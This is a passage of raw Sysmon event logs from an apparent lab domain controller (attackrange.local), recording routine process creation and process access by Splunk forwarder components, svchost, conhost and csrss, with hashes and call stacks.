Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002488Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:52.374{08A6967A-42A0-6000-7600-000000009A01}3824C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002514Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.540{08A6967A-42A1-6000-7700-000000009A01}25683748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002513Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A1-6000-7700-000000009A01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002512Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002511Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002510Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002509Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002508Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002507Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002506Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002505Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002504Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002503Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-42A1-6000-7700-000000009A01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002502Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.384{08A6967A-4298-6000-3400-000000009A01}23163912C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-42A1-6000-7700-000000009A01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002501Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:53.217{08A6967A-42A1-6000-7700-000000009A01}2568C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4298-6000-3400-000000009A01}2316C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.602{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4286-6000-0B00-000000009A01}852C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4299-6000-4100-000000009A01}39483968C:\Windows\system32\conhost.exe{08A6967A-42A2-6000-7800-000000009A01}4060C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002523Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002522Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002521Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002520Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:54.227{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002519Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 